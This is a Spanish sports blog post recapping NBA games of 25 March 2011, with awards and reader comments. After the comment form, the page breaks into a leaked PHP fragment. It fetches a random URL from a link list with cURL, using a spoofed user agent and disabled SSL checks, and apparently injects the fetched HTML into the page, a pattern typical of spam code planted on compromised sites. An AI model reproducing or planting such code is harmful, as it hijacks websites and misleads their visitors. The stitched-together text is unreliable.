La Crónica (25/03/2011)

26 de March de 2011 por txusma

Derrota no contabilizada de los Celtics contra Charlotte. Se les escapó en un último cuarto lamentable con un 30-15 en contra de parcial. Kwane Brown y DJ White haciendo daño por dentro ¿quién lo iba a decir? Pierce y Allen estuvieron muy mal y en el momento crítico no se encontró referente alguno para asegurar la victoria. Con este resultado ya pierden la ventaja campo en una hipotética final contra Lakers, pues estos ganaron brillantemente a unos Clippers combativos. Kobe y Pau volvieron a ser los mejores y tras ellos Artest, cuyo estado de forma lo refleja un mate a aro pasado que no se cree ni él que lo hubiera hecho.
Los Heat aprovecharon también el tropiezo para acercarse más a la 2ª plaza. Con Wade y LeBron estratosféricos los Sixers no fueron rival. Los Bulls son más líderes de conferencia con su apretada victoria contra Memphis y Orlando, por su parte cumplió trámite frente a los Nets.

A los Spurs también les voló un partido que tuvieron en sus manos. Quedaban 35 segundos y ganaban de 4 a Portland, con posesión. André Miller le robó la cartera a Parker. Después se la robó Matthews a Ginobili y un tapón de Splitter no evitó que Batum terminara lanzando y anotando dos tiros libres para empatar a 0.9 segundos. El caos vino con otra pérdida más directa desde el saque de banda. Balón para Portland, lo cuelgan a Batum y éste lo palmea para ganar. No queráis ver la carica que se le quedó a Popovic.

Pero hubo más tropiezos más o menos inesperados. El enésimo de los Knicks, haciendo el ridídulo en el Madison ante Jennings y los Bucks o el de los Pacers también en el Conseco derrotados por unos Kings que ni siquiera tuvieron que necesitar una gran versión de Tyreke, en su vuelta a las pistas.

Los Hornets confirmaron que pierden a West para los restos, pero lograron una victoria importantísima contra Phoenix. La jugada más destacada de Nash fue romperle la nariz a su compañero Gortat. Chris Paul le apretó bien las clavijas y también estuvo bien arropado por Landry, en sustitución de West. Si a alguien le extraña la pésima actuación de Vince, es que estaba enfermo.

Oklahoma ganó sin mucho sudar a Minnesotta, Denver hizo lo propio con Washington y, para terminar, los Cavs vencieron a Pistons y los Warriors le endosaron 138 a Toronto.

PREMIOS:

MVP: La pareja Wade-Lebron estuvo soberbia. 71 puntos, 21 rebotes, 10 asistencias, 6 robos y 6 tapones entre ambos. Demasiada tela para los Sixers.

Rookie: Buen partido de Demarcus Cousins y victoria King. ¿Qué más se puede pedir? El ex de Kentucky consiguió un doble-doble de 18  puntos y 14 rebotes.

Sorpresa: Chris Andersen encestó los 7 lanzamientos que intentó para irse a los 17 puntos. Además capturó 11 rebotes y puso 5 pinchos de merluza. El mejor de su equipo.

Decepción: Partido impropio de la categoría y el talento de Steve Nash. 1 de 9 en tiros de campo, 5 pérdidas y 3 solitarios puntos.

Esfuerzo en vano: Se rumorea incluso con que Kevin Love podría perderse todo lo que queda de temporada. En ese caso Anthony Randolph disfrutaría de muchos minutos y consolidaría las actuaciones que está mostrando en los últimos partidos. Anoche fueron 24 puntos y 15 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Vader dice:
    #1

    Lo de Anthony Randolph si que me mosquea un poco la verdad… En los Knicks no le dieron oportunidades, lo traspasan por Brewer al que cortan de inmediato y nos quedamos sin ninguno de estos dos jugadores que me parecen muy interesantes para cualquier rotación y más en NY donde no es que andemos sobrados… En fin que no lo entiendo…

    Saludos

      Citar

  2. Viva_Dirk dice:
    #2

    Yo tampoco entendí lo de Anthony Randolph en NY, no hay que lanzar las campanas al vuelo, pero deberian haberle dado esta temporada el puesto de 4 titular sin ninguna duda y ver que hacía.

    Si en lo que queda de temporada rinde bien los Wolves se encuentran con un equipo extremadamente joven, de muchísimo talento, con centímetros y veriamos si con Ricky, que si esto no le motiva no lo hará nada para irse a Minnessotta. Ricky-Wes Johnson-Beasley-Randolph-Love tiene una pinta escandalosa, y a poder ser largar a Beasley por algun jugador de equipo que aprete bien en defensa, sea escolta o alero.

      Citar

  3. Viva_Dirk dice:
    #3

    Se me olvidaba comentar lo de Boston, desde el traspaso su balance es de 9-7 y Rondo esta promediando 3 puntos menos, 3 asistencias menos y ha pasado de un 48% en tiros de campo a un 36%, han tocado algo que funcionaba muy bien y habrá que ver si les da tiempo a hacer funcionar esta nueva versión al nivel de la anterior.

      Citar

  4. HisRoyalAirness dice:
    #4

    Creo que se le está dando demasiada caña a Melo y por NY y me parece que el verdadero problema es D’antoni. La defensa y la motivación son cosas suyas, sino apaga y vámonos. En la primera parte Melo intentó echarse el equipo a las espaldas peleando por rebotes, anotando como un poseso y sacando faltas pero la inoperancia defensiva de los demás estaba siendo escandalosa. Es un problema de sistema, no saben que hacer y punto. Si el famoso sistema D’antoni no funciona tendrá que adaptarse a sus jugadores o irse por la puerta de atrás.

    Y en Boston ya pueden volver Shaq y/o Jermaine prontito porque sino tienen poco que hacer. Si no tienen juego interior pierden su baza contra, por ejemplo, Miami.

      Citar

  5. Sancho88 dice:
    #5

    Lo de la nariz de Gortat se veía venir, jeje.

    Empieza a ser preocupante la facilidad de los Spurs para perder partidos apretados, sobre todo si juegan fuera de casa. Me parece que Ginobili ya no tiene el primer paso de salida tan fuerte y pierde efectividad en los ultimos momentos. Las jugadas prepradas de otros años que siempre acababan en canasta suya, esta temporada se las defienden sin complicaciones. No se, ayer incluso el arbtiro le regalo un triple, tras una falta clarisima en el rebote que no quiso pitar. Sin Duncan y con Jefferson a saber donde, Spurs puede tener problemas serios. Su primera ronda contra Memphis tiene un pase, pero semis contra Oklahoma les doy por muertos si no vuelve Tim

      Citar

  6. CAMPO2 dice:
    #6

    Carter lleva enfermo desde que salió de los Nets

      Citar

  7. Denise dice:
    #7

    – Que bueno es Batum. Siempre soy objeto de burlas cuando digo que es el alero más completo tras Lebron y Durant. Pero me reafirmo. Sensacional, pedazo jugador.
    – El principal culpable de la situación de los Knicks es Melo, o mejor dicho el jefe de marketing de los Knicks que fue el que avalaría su fichaje. La pintura de los Knicks es de risa.
    En Denver están como las moscas, frotandose todo el día las manos.
    Cuando veo a Billups con la camiseta de los Knicks, me recuerda a Marbury
    – Orgia de puntos de los Warriors dandole un repaso a los Raptors, especialistas en ser humillados. Bargnani 0 rebotes en 27 minutos ante el “poderoso” juego interior de los Warriors.
    – Los Nets son tan malos que hasta Farmar y Vujacic parecen buenos. Y Brook Lopez 2 rebotes en 35 minutos. No los coge ni por casualidad.
    – Arenas 1 de 12 en el tiro. Pierdete y no vuelvas. Al final nos estaremos arrepintiendo de haber traspasado a Rashard Lewis!!
    – Que partidazo el de Artest. Robando, taponando y tirando de tres. Brutal.
    – Menos mal que estaban muertos los Heat…., Son los mejores del Este en mi opinión. La sombra de su Big Three es demasiado larga.

      Citar

  8. KB # 24 dice:
    #8

    Denise muy bueno lo de las moscas y Denver jajaja

    Yo lo que nunca podré entender es como Steve Novak (que sólo jugó 01:27, siendo estos los minutos calientes del partido) puede sacar la pelota de banda con todo el partido en el alambre. Este tipo de cosas me sacan de quicio, demuestran poca profesionalidad y poco sentido común (no son Parker, Ginobili o Hill mejores pasadores que Novak??)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>